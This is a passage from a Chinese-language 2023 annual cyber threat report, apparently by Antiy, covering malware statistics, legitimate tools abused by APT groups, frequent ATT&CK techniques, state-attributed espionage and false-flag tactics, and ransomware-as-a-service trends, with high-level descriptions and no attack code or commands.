数量最多的前三个分类依次是特洛伊木马、蠕虫和灰色软件,恶意代码执行体数量分别为114,891,344个、18,501,705个和12,744,053个,占比分别为73.03%、11.76%和8.10%。 与上一年度(2022年度)相比,2023年度新增捕获恶意代码执行体中,数量增长最多的类别为特洛伊木马,年度差异数量值为50,945,459个,同比增长79.67%;数量减少最多的类别为灰色软件,年度差异数量值为38,785,334个,同比下降75.27%。 更多关于恶意代码知识及统计信息,可前往安天计算机病毒分类命名知识百科(virusview.net)进一步查阅。 根据安天公司监测结果,2023年与2022年新增捕获恶意代码家族数量分类比较如下图所示,2023年监测结果与去年相比,绝对数量增长最多的是木马,全年捕获木马类家族数量为2503个,与去年相比增长1216个。 图2-13 2023年度,新增恶意 2.2 2023年网空攻击的常见非恶意代码执行体 随着网络攻击手段和渠道的多元化发展,APT组织不断改进其技战术策略,除了使用商业工具、自研工具以及开源工具外,也逐渐将合法工具纳入其武器库。基于对2023年全球APT攻击事件的持续监测与分析发现,APT组织的攻击活动中涉及近50种合法工具,包括但不限于Mimikatz、PsExec、AnyDesk、AdFind、PLink等,不仅涉及Gamaredon、舒适熊/APT29、奇幻熊/APT28等高能力APT组织,也包括污水/MuddyWater、Kimsuky、拉撒路/Lazarus等一般能力APT组织。通过使用合法工具,APT组织能够将恶意活动隐藏在正常的网络流量中,绕过网络安全防御策略。同时,合法工具也大大增加了安全人员对APT组织追踪溯源的难度。在网络安全防护能力不断提升的安全趋势下,APT组织将会继续使用合法工具来增加攻击成功率,通过对合法工具进行灵活配置,在目标系统上隐秘执行凭证转储、权限提升、信息收集等不同恶意活动,以适应不同业务场景下的APT攻击。 APT组织使用的合法工具TOP 10包括Mimikatz、PsExec、AnyDesk、AdFind、Plink、Netcat、TeamViewer、Masscan、UltraVNC、Ligolo,工具的描述信息如下: Mimikatz是一款黄帽子(黑客)工具,最初由法国黑客Benjamin Delpy开发,并于2011年首次发布,该工具除了可执行文件版本外还存在脚本类型版本。Mimikatz的主要功能是获取和操控Windows操作系统中的凭证,如用户登录密码、Windows登录凭据(NTLM哈希和Kerberos票据)以及各种应用程序和服务的凭证。Mimikatz设计的目的是揭示Windows系统中密码和凭证管理的薄弱点,并用于安全专业人员的演示和教育目的。然而,由于其功能强大且广泛被黑客所利用,Mimikatz也被视为危险的工具,用于进行恶意攻击、数据窃取和潜在的勒索活动。凭借其高度灵活和兼容性,Mimikatz已被APT组织或网络犯罪组织应用于攻击活动中,其中安天于2020年监测到苦象组织使用PowerShell脚本形式的Mimikatz工具。 Psexec是一个命令行网络管理工具,是Sysinternals Suite系统组件的一部分,其调用了Windows系统的内部接口,以远端Windows主机账户名、密码和要执行的本地可执行文件为输入参数,基于RPC$服务实现,将本地可执行文件推送到远端主机执行,其设计初衷是为了便于网络管理人员以实现敏捷的远程运营。但由于其作为命令行工具便于被调用封装,也导致极易被攻击者作为攻击工具使用,在完成口令破解后,实现一次性投放执行。早在2003年,广泛出现大量基于空口令和常见口令进行传播的系列“口令蠕虫”,大部分都使用了这个机制。特别是出品该系统组件的Sysinternals的团队在2006年7月18日被微软收购,导致其后续版本都带有微软的数字签名,所以也连带导致其会被较大比例的安全软件放行。 AnyDesk是一款由德国公司AnyDesk Software GmbH推出的远程桌面软件。用户可以通过该软件远程控制计算机,同时还能与被控制的计算机之间进行文件传输,主要应用于客户日常运维和业务相关主机的远程管理。这一软件是常用网管工具、由正规软件研发企业发布,且有对应厂商数字签名,往往被作为白名单软件。但这也使攻击组织在活动中利用这类软件的远程管理功能实现持久访问、文件传输,并利用其是合法签名执行体来规避检测。 Adfind是一款在域环境下的信息搜集工具,允许用户在域环境下轻松搜集各种信息。它提供了大量的选项,可以优化搜索并返回相关详细信息,是内网域渗透中的一款利器。 Plink工具是PuTTY软件中的一个组件,主要功能类似于Linux系统上的ssh命令行工具,用于SSH连接远程主机,同时提供多种方式创建或管理SSH会话。由于其属于PuTTY软件的一个组件,具备数字签名,能够规避以数字签名作为白名单检测机制的终端防护软件的检测。 Netcat是一款简单的Unix实用程序,支持Windows和Linux环境,用于在TCP或UDP协议连接的网络上读取和写入数据。该实用程序能够直接使用或由其他脚本启动,由于使用简单且灵活,常被用于网络调试或各种网络脚本中,以建立网络连接。 TeamViewer是一款远程桌面工具,兼容于Microsoft Windows、macOS、Linux、iOS、Android操作系统,支持远程控制和在线协作等功能。 Masscan是一款高速端口扫描工具,具备出色的扫描效率和大规模扫描的能力,支持TCP和UDP协议的扫描,并能够根据用户的需求指定多个目标和端口。同时,Masscan还采用了网络性能优化技术,充分利用操作系统的资源和多核处理能力,实现了卓越的扫描效率和吞吐量。 UltraVNC是一款开源远程管理/远程桌面软件实用程序。客户端支持Microsoft Windows和Linux,但服务器仅支持Windows。它使用VNC协议,允许一台计算机通过网络连接远程访问和控制另一台计算机。 Ligolo是一款专为安全测试人员设计的轻量级反向隧道工具,实现和使用都非常简单,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。与Meterpreter等工具相比,Ligolo的运行速度更快,并且更加稳定。 表2-1 APT组织使用的合法工具 装备名称 装备类型 运行平台 核心功能 关联威胁组织 Mimikatz 正常工具 Windows 权限提升、凭据窃取 拉撒路/Lazarus、污水/MuddyWater、海莲花/APT-TOCS、舒适熊/APT29、白象/WhiteElephant等 PsExec 实用程序(Utility) Windows 远程访问、命令执行 Gamaredon、舒适熊/APT29、图拉/Turla、人面马/APT34等 AnyDesk 正常工具 Windows、Linux、macOS、Android 、iOS等 远程控制 苦象/Bitter、Gamaredon、舒适熊/APT29等 AdFind 正常工具 Windows 域信息搜集 舒适熊/APT29、拉撒路/Lazarus等 PLink 正常工具 Windows、Linux 端口转发 拉撒路/Lazarus、污水/MuddyWater、Charming Kitten /APT35、Chafer/APT39等 Netcat 实用程序(Utility) Windows、Linux 远程访问、文件传输、端口扫描 绿斑/GreenSpot、海莲花/APT-TOCS等 TeamViewer 正常工具 Windows、Linux、macOS、Android 、iOS等 远程控制 APT37、Kimsuky、黑店/DarkHotel等 Masscan 正常工具 Windows、Linux、macOS 端口扫描 Gamaredon 、TeamTNT等 UltraVNC 正常工具 Windows、Linux 远程控制 Chafer/APT39、Gamaredon等 Ligolo 正常工具 Windows、Linux、macOS 网络隧道 污水/MuddyWater 2.3 2023年网空威胁框架攻击技战术分析统计 基于对2023年全球APT攻击事件的持续监测和分析,梳理分析了APT攻击事件中涉及的技战术策略,并映射到网空威胁框架ATT&CK,覆盖了12个战术阶段,240多种技术和子技术,使用频率最高技术和子技术包括但不限于发现系统信息(T1082)、发现文件和目录(T1083)、发现安全软件(T1518.001)、虚拟化/沙箱逃逸(T1497)、使用应用层协议(T1071)等,涉及舒适熊/APT29、拉撒路/Lazarus、肚脑虫/DoNot、污水/MuddyWater等多个APT组织。综合来看,APT组织使用的高频技战术主要分布在发现(TA0007)、防御规避(TA0005)以及命令与控制(TA0011)战术阶段。通过对威胁框架视角的攻击映射,能够从宏观层面了解APT攻击的威胁态势,支撑安全人员制定网络安全防御策略。 表2-2 2023攻击活动中高频技战术TOP10 战术 战术名称 技术 技术名称 关联威胁组织 TA0007 发现 T1082 发现系统信息 肚脑虫/DoNot、Andariel、响尾蛇/SideWinder、舒适熊/APT29、拉撒路/Lazarus等 TA0007 发现 T1083 发现文件和目录 拉撒路/Lazarus、奇幻熊/APT28、Kimsuky、污水/MuddyWater等 TA0007 发现 T1518.001 发现安全软件 SideCopy、污水/MuddyWater、响尾蛇/SideWinder等 TA0005 防御规避 T1497 虚拟化/沙箱逃逸 污水/MuddyWater、Andariel、舒适熊/APT29、苦象/Bitter等 TA0011 命令与控制 T1071 使用应用层协议 苦象/Bitter、白象/WhiteElephant、Kimsuky、APT37等 TA0005 防御规避 T1027 混淆文件或信息 透明部落/APT36、拉撒路/Lazarus、响尾蛇/SideWinder、奇幻熊/APT28等 TA0002 执行 T1129 利用共享模块执行 奇幻熊/APT28、污水/MuddyWater、拉撒路/Lazarus、舒适熊/APT29等 TA0005 防御规避 T1036 仿冒 盲眼鹰/BlindEagle、人面马/APT34、拉撒路/Lazarus、Kimsuky等 TA0011 命令与控制 T1095 使用标准非应用层协议 拉撒路/Lazarus、透明部落/APT36、苦象/Bitter、舒适熊/APT29等 TA0007 发现 T1018 发现远程系统 苦象/Bitter、舒适熊/APT29、Andariel、白象/WhiteElephant、透明部落/APT36等 3.2023年重点威胁与风险回顾 3.1 高级持续性威胁(APT)与地缘安全冲突 2023年全球高级持续性威胁(APT)活动的整体形势依然非常严峻。基于安天持续监测的内部和外部的情报来源,2023年全球公开安全研究报告数量696篇,其中披露的安全报告涉及162个APT组织,2023年新增66个APT组织。安天梳理了2023年全球APT组织及行动的分布和活跃情况,制作了“全球APT攻击行动、组织归属地理位置分布(活跃)图”,如图 2 1,其中APT组织共556个(图片空间有限仅展示主要攻击组织),根据图示可以发现其主要分布于美国、俄罗斯、印度、伊朗、朝鲜半岛及部分国家和地区,部分组织由于情报较少未能确定归属国家或地区。 图3-1 2023年全球APT攻击行动、组织归属地理位置分布(活跃)图 3.1.1 美国依然是世界网络安全的主要威胁 A2PT是高级的高级可持续性威胁[1],是中国网络安全从业者在分析超高能力国家/地区威胁行为体的攻击活动中提出的技术概念。以美国情报机构NSA、CIA等为背景的“方程式”等攻击组织依托成建制的网络攻击团队、庞大的支撑工程体系与制式化的攻击装备库、强大的漏洞采购和分析挖掘能力,对全球关键信息基础设施、重要信息系统、关键人员等进行攻击渗透,并在五眼联盟成员国内部进行所谓的情报共享,对世界各国网络安全构成严重威胁。 2023年4月11日,中国网络安全产业联盟(CCIA)发布了长篇报告《美国情报机构网络攻击的历史回顾——基于全球网络安全界披露信息分析》 [39],基于全球数十家网络安全企业、研究机构及专家学者的近千份历史研究文献,充分整合各方分析过程及研究成果,力求通过业界和学界的分析实证,努力呈现美相关机构对他国进行网络攻击的情况,揭示网络霸权对全球网络空间秩序构成的重大破坏及严重威胁。《报告》按照时间和事件脉络,共分为13篇,主要包括美国情报机构网络攻击他国关键基础设施,进行无差别网络窃密与监控,植入后门污染标准及供应链源头,开发网络攻击武器并造成泄露,所售商用攻击平台失控而成为黑客利器,干扰和打压正常的国际技术交流与合作,打造符合美国利益的标准及秩序,阻碍全球信息技术发展,制造网络空间的分裂与对抗等。报告以中英文双语发布,在国际国内引发巨大反响。 2023年4月13日,五角大楼“泄密门”事件再次曝光美国窃听包括以色列、日本、韩国在内的重要盟友政府信息、窃听联合国秘书长通信,以及监视其“盟友”乌克兰总统泽连斯基等。 2023年6月1日开始,俄罗斯安全厂商卡巴斯基发布“三角测量行动”系列报告[2],披露了一个潜伏数年的iOS恶意代码及多个iOS系统零日漏洞。对此,俄罗斯联邦安全局(FSB)发布声明指责美苹果公司与NSA“密切合作”,通过复杂的恶意软件入侵了数千部苹果手机[3]。“三角测量行动”利用iOS系统内置的iMessage消息服务和iOS系统零日漏洞实现对苹果设备的“零点击”攻击。攻击者起初利用WebKit内存损坏和字体解析漏洞获取执行权限,随后利用整形溢出漏洞提升得到内核权限,再利用多个内存漏洞突破苹果硬件级的安全防御功能,在设备上执行并植入恶意程序。整个过程完全隐藏,不需要用户执行任何操作。卡巴斯基报告认为[4],面对复杂攻击者,任何保护都可能被突破,依赖“隐晦式安全”(security through obscurity)的系统永远不可能真正安全。6月10日,安天发布报告《“量子”系统击穿苹果手机——方程式组织攻击iOS系统的历史样本分析》[11],公开了对美方依托量子系统,针对手机浏览器进行攻击投放的历史样本分析。 2023年7月26日,武汉市应急管理局发布公开声明称,“武汉市地震监测中心遭受境外组织的网络攻击。部分地震速报数据前端台站采集点网络设备被植入后门程序。”国家计算机病毒应急处理中心和一家国内网络安全厂商联合调查指出[3],已经在受害单位的网络中发现了技术非常复杂的后门恶意软件,符合美国情报机构特征,具有很强的隐蔽性,并且通过恶意软件的功能和受影响的系统判断,攻击者的目的是窃取地震监测相关数据,而且具有明显的军事侦察目的。 2023年10月,Lazarus组织旗下一款跨平台的远程控制框架MATA被发现投入到针对东欧工业公司的网络间谍活动中[4],该框架最早于2019年被发现[7],早期的版本主要表现出针对Windows、Linux、macOS三方跨平台能力,拥有丰富的窃密控制插件以及独特的多层算法通讯加密,足够典型但并无先进性可言。经过5代版本的更新迭代,MATA框架的研发人员明显参考了多年来安全行业针对“五眼联盟”APT攻击能力的技术研究,以及Vault7和“影子经纪人”等泄露的武器装备资料。卡巴斯基报告认为[4],该APT表面看有朝鲜Lazarus组织的痕迹,但复杂的技术和过程以及攻击资源的富有奢侈程度,怀疑背后真正的组织可能是“五眼联盟”。 3.1.2 关键人员手机一直是A2PT攻击组织的重点目标 近些年来,智能手机已经成为人们不可或缺的一部分,智能手机承载着个人通讯、娱乐、工作、学习、社交等多种需求,手机内存储着大量个人工作、生活的数据资料,对很多人来讲手机可能比PC更加重要。同时,手机等智能终端设备具有远超传统PC节点的广泛感知能力,其带有多种传感器(包括用于获取高精度定位的传感器,加速度传感器、重力传感器、陀螺仪和旋转矢量传感器)可用于获取当前设备的高精度即时动态。除了高精度传感器外,还有摄像头、麦克风这种输入输出的硬件采集装置,甚至是基于Wi-Fi、蓝牙模块进行周边环境和设备的扫描和收集。这种特性使得一旦成功入侵手机,就可以将其变成攻击者的图像、声音、位置等专业窃密器。 但长期以来,很多人认为手机系统生态更加安全,一方面认为智能终端系统,出厂即带安全软件和权限管理且软件应用经过市场审核,只要或私自安装软件就能保证安全;另一方面认为以iOS为代表的封闭操作系统,给人以“黑盒”似的安全感,很多用户认为看不到攻击就没有攻击发生。殊不知攻击者有多种入口攻击智能手机,也有多种技术手段将自己潜伏隐藏。 2016年,安天捕获到了美国NSA下属方程式组织针对iOS系统的方程式样本,确定了该木马为方程式组织的DoubleFantasy家族,通过量子系统向iOS投放。相关分析成果安天在今年6月10日公开,并配套绘制了“量子”系统对流量劫持向终端发起攻击的猜想图,如图2-3,依托该系统美方可对全球智能终端设备发起漏洞攻击并植入木马[11]。2021年,英国广播公司(BBC)报道,以色列软件监控公司NSO向一些国家售卖了一款名为“飞马”的手机间谍软件,用以监控各类重点人员甚至他国的相关政要。“飞马”软件可以轻而易举地入侵iOS和Android系统,并轻松截取手机里的各类信息、图片、视频、电邮内容、通话记录,甚至可以秘密开启麦克风进行实时录音。 2023年,俄罗斯安全厂商卡巴斯基发布“三角测量行动”系列报告[2],披露了一个潜伏持续数年的iOS恶意代码及多个iOS系统零日漏洞。卡巴斯基的研究员最初是在流量上发现了异常,在对终端分析的时候面临无法对iOS系统进行全面取证的问题,此时的封闭系统反而成为一个难以有效进行环境分析和取证的劣势。在最新的“三角测量行动”报告结尾[12],卡巴斯基研究员认为“面对复杂攻击者,任何保护都可能被突破,依赖“隐晦式安全”(security through obscurity)的系统永远不可能真正安全。”以上多个案例都说明,智能终端设备并不安全,反而由于其系统和生态特性一旦被攻击可能长期不被发现,当前的手机和智能终端的安全性除依托系统本身还需要更多的安全关注。 图3-2 量子系统可攻击场景图谱化分析 除此之外,安天根据斯诺登曝光资料,梳理了NSA的ANT攻击装备体系,在2008年前后陆续列装的攻击装备体系中用于对移动通讯设备扫描、监控和数据收集的攻击装备,共有15种,约占全部48种已曝光装备的三分之一。 图3‑3 ANT针对移动通讯设备的网络攻击装备(红色框内) 3.1.3 A2PT组织的示范效应导致了其他组织的跟进模仿和军备竞赛 A2PT具有拥有严密的规模建制,掌控体系化的攻击装备研发和攻击资源采集运营,A2PT所研发使用的武器装备通常具备模块化、框架化的架构、可基于可拓展脚本引擎开发、防御软件规避对抗、采用高强度加密算法、支持内核级Rootkit、组件非落地资源化隐藏、VFS虚拟文件系统、隔离网络穿透、量身定制攻击、丰富窃密采集能力等一整套复杂的高阶能力设计,体现出明显的庞大支撑工程体系优势,诸如具备五眼联盟成员国背景的A2PT威胁如“震网”(Stuxnet)、“毒曲”(Duqu)、“火焰”(Flame)、“方程式”(Equation Group)、“索伦之眼”(ProjectSauron)、“瑞晶”(Regin)等大多具备上述先进优势特点。相对于以“影子经纪人”(Shadow Brokers)泄露方程式组织武器库为典型的超级大国网络军备扩散直接造成噩梦般的大面积安全事件,A2PT攻击组织的历史使用的高阶攻击技术近年来被APT组织广泛应用于各自攻击活动中,该趋势所带来的影响则显得更为潜移默化且深远。 2023年10月,Lazarus组织旗下一款跨平台的远程控制框架MATA被发现投入到针对东欧工业公司的网络间谍活动中[4],该框架最早于2019年被发现[5],早期的版本主要体现有针对Windows、Linux、macOS三方跨平台能力[6],拥有丰富的窃密控制插件以及独特的多层算法通讯加密,足够典型但并无先进性可言。经过5代版本的更新迭代,MATA框架的研发人员明显参考了多年来安全行业针对“五眼联盟”APT攻击能力的技术研究,以及Vault7和“影子经纪人”等泄露的武器装备资料,例如MATA框架的C2通讯过程采用TTLV(Type-Tag-Length-Value)数据编码格式、多层协议和有限状态机(FSM)握手机制,该技术早期曾被Lambert和方程式组织的多款武器中使用;MATA攻击过程中使用自带易受攻击的驱动程序(BYOVD)技术访问系统内核干扰EDR软件的检测响应,该技术也曾被Lambert组织使用;MATA后门支持主动连接/被动激活的组合模式,该类后门启用模式被方程式组织的EQUATIONVECTOR、STRAITBIZARE和Lamberts组织的GoldLambert装备广泛使用;MATA组件支持通过感染可移动存储设备中的软件程序试图针对隔离网络发起攻击,而利用摆渡攻击策略突破隔离网基本是震网、Fanny、索伦之眼等经典A2PT攻击的标配能力。卡巴斯基报告认为,该APT表面看有朝鲜Lazarus组织的痕迹,但复杂的技术和过程以及攻击资源的富有奢侈程度,怀疑有可能是“五眼联盟”APT。 3.1.4 APT组织借鉴开源情报以“假旗”信标隐蔽攻击行为 在网络安全领域中“假旗”(False Flag)是一种十分常见的攻击行为隐蔽策略,通常水平相对高超的攻击者会刻意在攻击流程中的资源预置、抵近突破、驻留潜伏、控制致效等阶段中埋设虚假信息,例如留下语言、位置、身份等信息掩盖来源方向,也可以是散布挖矿、勒索、银行木马等常规威胁来掩盖致效意图,也可能是复用独家武器工具、特征代码数据、过期基础设施,复现独家漏洞、作战技术具体实现、作战战术路径、软件编码风格等,将攻击行为痕迹指向其他具体的已知威胁行为体。“假旗”策略的具体实现不论是设定位置还是栽赃对象,在数量方面通常来说都是宜少不宜多,宜精从简,能造成一定追踪分析成本代价往往能增加更好的效果,而当前业内十余年大量的公开APT研究资料也成为了攻击组织“假旗”构思的重要参考来源。下图举例了海莲花组织的“假旗”仿冒手段。 图3‑4 2023年海莲花组织的“假旗”栽赃手段 2022-2023年,APT29组织频繁采用鱼叉式钓鱼邮件投递附件包裹的模式,通过诱导受害者执行包裹中的快捷方式调动其他白加黑组件序列,多层加载解密在仅内存中运行如CobaltStrike、RatelC4等红队工具的远控载荷,此类攻击的活动范围基本限于欧美地区的政治军事目标,且数量众多反复被主流厂商分析曝光;2023年全年,安天多次在我国重要政企单位发现类似的攻击模式,且在涉及的攻击技战术、武器工具和基础设施中也发现多处曾被公开曝光的APT28、APT29组织特征痕迹。例如初始阶段加载器的解密密钥与2022年已曝光的APT29活动完全一致[7];投递阶段的加载器组件模仿了2018年APT28组织Zebrocy加载器所用的信息窃密和隐藏窗口执行代码,以及ADS流数据存储技术和相同特征参数[8],深入分析发现攻击者目的仅是执行自定义的加载器代码来调用其他模块;投递阶段的注入器组件静态看与2018年已曝光的APT28组织Zebrocy远控完全一致[9]。深入分析发现是攻击者篡改劫持了Zebrocy旧样本的代码流程,转而执行样本资源节中隐藏的远控载荷;最终控制阶段的远控载荷使用特定破解版本的CobaltStrike,该版本的水印数值已知被APT29、TrickBot、SmokeLoader等威胁组织经常使用,相关C2基础设施配套的数字证书的使用者信息字段还包含典型的Wellmess组织特征[10]。上述多处特征痕迹显得有几分刻意,安天基本认定是属于攻击者制造遗留的“假旗”,且分析判定表明攻击活动涉及的组织背景实际疑似为海莲花组织,攻击者此举纯粹是尝试误导溯源调查方向,并未采集利用“假旗”中仿造的其他威胁组织工具手段的执行结果。 3.1.5 地缘冲突的网络战中伴随大量的黑客行动主义活动 巴以冲突是今年新爆发的地缘安全热点。巴以冲突爆发前,中东方面就有伊朗背景的多个APT组织Agrius、APT35、MuddyWater、OilRig持续地将以色列关键基础设施等行业作为打击目标、也有长期以来支持巴勒斯坦情报收集的APT组织TA402[13]。在巴以冲突爆发后与哈马斯有关联的WildCard组织[14]尝试修改TTPs(包括C2从Google Drive转向OneDrive、SysJoker样本从C++到Rust语言的变化)针对以色列进行新一轮攻击等具有战略意志的APT活动,但受限于自身技术以及美国、以色列众多网络安全厂商的频繁曝光,总体来看这些APT组织具有广泛的情报收集能力(CNE)但其针对定向性目标的IT技术网络攻击能力(CNA)运用不足。同样作为地缘安全热点激化的网络冲突,在俄乌冲突中占主导作用的网络攻击行为主要是俄、乌、北约等国家行为体实施的作战行动,以军事系统、关键信息基础设施为目标,通过入侵突防、恶意代码植入,获取长期控制权,实现持续信息窃取,并可瘫痪、干扰关键系统运行。期间虽然也有大量民间黑客组织基于自身立场战队宣誓,但这些活动的象征意义居多。巴以冲突是实力完全非对等但纠葛更复杂的冲突,国家、民族、宗教等地缘安全背景更加复杂,以色列情报机构有极强的攻击能力,始终对周边国家进行攻击渗透,网空情报能力是其战略情报能力的重要支撑。但巴方本身并没有特别成熟的信息基础设施和网空作业力量。基本上是大量民间行为体和以方间的一场混战。而且,为报复对以色列的支持,新加坡、日本、意大利在内的目标都遭到攻击,风险快速外溢。 相对平衡的黑客组织势力站队不同,巴以冲突中,巴方并没有,大多数民间组织站到了同情巴方一侧。在巴以冲突爆发后,包括亲巴勒斯坦的黑客组织和亲以色列的黑客组织在社交媒体中不断宣扬着黑客行动主义,属于典型的非国家行为体受意识形态驱动的黑客组织行为体活动。但媒体大肆宣传的“巴以冲突网络战”,对实际冲突进程影响甚微,其效果远弱于网空认知战。与俄乌冲突网络战进行对比,巴以冲突中出现的DDoS、擦除性恶意代码也不是仿照俄乌冲突的“抄作业”行为,与俄乌网络战中出现的国家行为体攻击活动不同,巴以冲突更多的出现的是黑客主义行为体。巴以冲突的网络战作业模式、致效结果都与俄乌冲突存在明显差异。第一点,从冲突爆发的地缘政治背景考虑,俄乌网络战中攻击的目标基本是一致的、有组织有计划的网络攻击,而在巴以冲突中,多个不同的黑客组织缺少协调工作和明确的目标,多数是打击报复行为,例如入侵包括新加坡、日本、意大利在内的目标针对其支持以色列进行报复。第二点,从国家行为体背景和网络战实际影响考虑,俄乌网络战活动中存在着多个国家背景的行为体并且可以联合Trickbot等黑客组织发起的网络攻击活动产生了实际的影响,为现实冲突赢得了先机。 而据称与哈马斯有关联的黑客团队Storm-1133虽然声称入侵以色列国防部网站窃取数据,但其网络攻击活动对现实冲突产生的影响有限。第三点,从攻击意图考虑,巴以冲突中的激进的黑客行动主义活动试图在短期内制造更多的影响,俄乌冲突则是在地缘政治背景下长期持续性的网络攻击活动。从整体的中东局势观察,包括伊朗、叙利亚、以色列等国在内的网络攻击活动不断,例如2023年12月18日伊朗加油站疑似遭到以色列黑客网络攻击。越来越多的黑客行动主义将随着巴以“火药桶”的引爆在网络空间针对关键基础设施带来威胁、影响牵动中东各国敏感神经。 3.2 勒索攻击与其他的网络黑产犯罪活动的动向 3.2.1 勒索攻击采用定向+RaaS的组合模式,形成“定向勒索+窃密+曝光+售卖”链条作业 3.2.1.1 具备“APT”水平的定向勒索攻击已趋于常态 在当前网络安全舞台上,定向勒索攻击已经成为一种极为普遍且极具威胁性的攻击形式。在2019年[14]和2020年[15]的安天年报中,我们指出了勒索攻击组织在目标选择方面更趋向于有针对性,专注于对有价值攻击目标的定向勒索。在2021年[16]的安天年报中,我们评估了定向勒索攻击的能力已经达到了“高级持续性威胁”(APT)水平。当前这种攻击方式不再仅仅是网络空间的短暂风波,而是已经深刻融入了现代威胁景观的主流。定向勒索攻击是一种专门针对特定目标的网络攻击,其目的在于通过威胁受害者,迫使其支付赎金。攻击者通过深入的目标分析和侦察,有选择性地攻击关键的系统、数据或信息,迫使受害者在支付高昂赎金或面临数据泄露等威胁的情况下做出抉择。 回顾2023年,大型企业频繁成为定向勒索攻击的目标,如英国皇家邮政、日本名古屋港口和波音公司等都面临了不同程度的威胁。波音公司遭受勒索攻击是一起基于Lockbit勒索攻击组织所提供的RaaS基础设施的针对知名企业的定向勒索攻击事件。攻击者以ADC网络边界设备为初始突防点,把握了相关设备在出现漏洞后未及时响应带来的机会窗口,在相关漏洞利用代码出现后,实现了第一时间发掘利用,以此实现凭证窃取。之后利用凭证完成进一步的横向移动和向场景中按需投放的落地能力。攻击组织运用了大量开源和商用工具作为实现不同功能的攻击组件,并通过突破域控等关键主机,实现进一步的凭证权限窃取实现准确和有效投放,窃取了所攻陷主机的相关数据,实现了勒索软件部署。 通常情况下,大型企业在网络架构上通常部署了相应的网络安全防护设施,足以抵御非定向广泛攻击。然而,当面对定向勒索攻击时,企业的网络安全体系显得相对薄弱,因为这类攻击的实施者实质上具备了APT的水平,并将其与勒索软件相结合,对抗能力已经远远超越了单个防护产品的极限,尤其是终端防护系统等产品的防御范围。同时,定向勒索攻击的威胁程度逐渐升级,攻击者的工具和手段也在不断演进。随着勒索软件即服务(RaaS)的崛起,即便是缺乏高深技术水平的个体也能够轻松购买和使用专业的勒索工具,进一步扩大了定向勒索攻击的范围。攻击者不再局限于技术精湛的专业团队,而是包括更广泛的参与者,这使得定向勒索攻击呈现更为多样化的特征。综合来看,当前具备“APT”水平的定向勒索攻击已趋于常态。 3.2.1.2 愈发成熟的勒索即服务模式使勒索攻击 网络犯罪的商业化趋势推动威胁行为者不断提升威胁行为的复杂程度。类似于正常供应链,这些行为者在网络犯罪供应链的特定领域内表现出熟练的专业知识,使得整个行业呈现出高效运作的趋势。网络犯罪行业采用了“即服务”(RaaS)的商业模式,极大地提高了实施网络犯罪的便捷性;即使是相对不成熟的威胁行为者也能轻松获取高级工具和服务。这一趋势使得网络犯罪的从业者能够更迅速、便捷地进行攻击,从而对网络安全形成更大的挑战。 RaaS模式的广泛应用推动了众多勒索软件组织的兴起,勒索攻击事件层出不穷,包括BlackCat、Clop和LockBit等组织,其中LockBit更是成为全球最活跃的勒索攻击组织之一。勒索攻击组织通过RaaS模式吸纳附属成员,附属成员则通过初始访问经纪人(IAB)建立初始访问权限,实现各自专业领域的细化运作。RaaS运营方专注于改进和更新其恶意软件,而附属成员和IAB负责开发和优化渗透系统的方法。“Gold Melody”是一支以经济为动机的IAB黑客组织 [17],又名Prophet Spider或UNC961。该组织通过多种手段入侵目标系统,窃取凭证后进行出售,供勒索攻击组织实施有针对性的攻击。 网络犯罪商业化推动威胁行为者提升攻击复杂度,形成专业化和高效运作趋势。采用“即服务”商业模式使实施网络犯罪更便捷,即便是没有任何技术技能的行为者也能通过点击网页生成窃密勒索工具。这将是全球数字化时代面临的一场难以终结的噩梦。 3.2.1.3 勒索攻击组织利用漏洞武器化进行高效突防 在当前网络威胁不断升级的背景下,将漏洞武器化以实现对攻击目标的入侵已成为勒索软件最为有效的攻击手段之一。根据美国网络安全基础设施安全机构CISA的统计数据,截至2023年12月25日,已有1053个漏洞被用于网络攻击[18],其中有212个漏洞明确被用于勒索攻击,这些漏洞涉及Microsoft、QNAP、VMware、Accellion、Citrix和MOVEit等。在面对企业部署的网络安全防护设施时,攻击者可能难以通过传统手段攻破防线,但通过武器化未修补的漏洞作为突防工具,攻击者可以绕过安全检测和身份验证,轻松实施恶意行为。 2023年初,安全研究人员在打印管理软件PaperCut中发现了两个漏洞[19],分别是CVE-2023-27350和CVE-2023-27351。多个勒索攻击组织利用这些漏洞成功入侵PaperCut供应链,随后向供应链下游用户投放勒索软件,包括Clop、LockBit和Bloody等勒索攻击组织。在同年5月,Clop勒索攻击组织借助文件传输软件MOVEit的漏洞CVE-2023-34362[20],展开大规模的勒索攻击活动。这次攻击导致众多MOVEit软件用户成为Clop的受害者。攻击者充分利用该漏洞,成功突破目标系统的防线,实施了“窃密+加密”操作,并公开了658家企业因此次勒索攻击活动而受害的信息。而在10月,LockBit勒索攻击组织则利用Citrix的漏洞CVE-2023-4966[21],即Citrix Bleed,将波音公司列为受害者之一。本事件用于突防的CVE-2023-4966漏洞的利用代码(POC)10月26日在Github上出现,27日攻击者宣布入侵波音成功。我们倾向攻击发生在POC代码公开后。Citrix 已于10月10日修复,但波音等机构并未进行修补。这反映出攻击者对漏洞资源的运用效率和敏感性远胜于防御方。这一系列事件凸显出漏洞利用在供应链攻击和大规模勒索活动中的危害性,漏洞武器化已然成为勒索攻击组织突破防御的有效抓手。 由于攻击者能熟练使用网络空间测绘引擎的等开源情报,并长期关注积累对重要信息目标的暴露面,因此在POC代码出现后,会有一大批攻击者快速匹配寻找可突防目标。从漏洞的角度看,此前关于0day-1day-Nday的概念,更多还是建立在漏洞发布或公开的时点上,但POC代码被公开,则更是其中需要高度关注的节点,其意味着利用难度瞬间降低,攻击活动的高峰会迅速到来。安天CERT把类似攻击称为1Exp攻击。由于RaaS+定向勒索本身又构成了一种“众筹犯罪”模型,导致关注不同目标资源或拥有目标信息资源的大量攻击者,都可能在发现机会窗口时尽可能的将机会窗口转化为实际收益。 3.2.1.4 勒索攻击形成“定向勒索+窃密+曝光+售卖”链条作业 从波音遭遇勒索攻击事件分析复盘报告中可以看出,目前勒索软件的RaaS模式不仅仅是提供技术基础设施,而是结合宣传炒作、曝光窃取数据、拍卖窃取数据、将受害人举报到监管机构等方式对受害人实施压力,并制造新闻热点,提升品牌效应,从而以滚雪球方式让勒索组织形成臭名昭著的品牌效应。定向勒索模式针对高价值目标,RaaS的附属成员通过各种方式,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等手段提高突防能力,提升勒索载荷落地成功率。这种定向+RaaS的组合模式,形成“定向勒索+窃密+曝光+售卖”链条作业,胁迫受害者支付赎金从而实现获利。 3.2.2 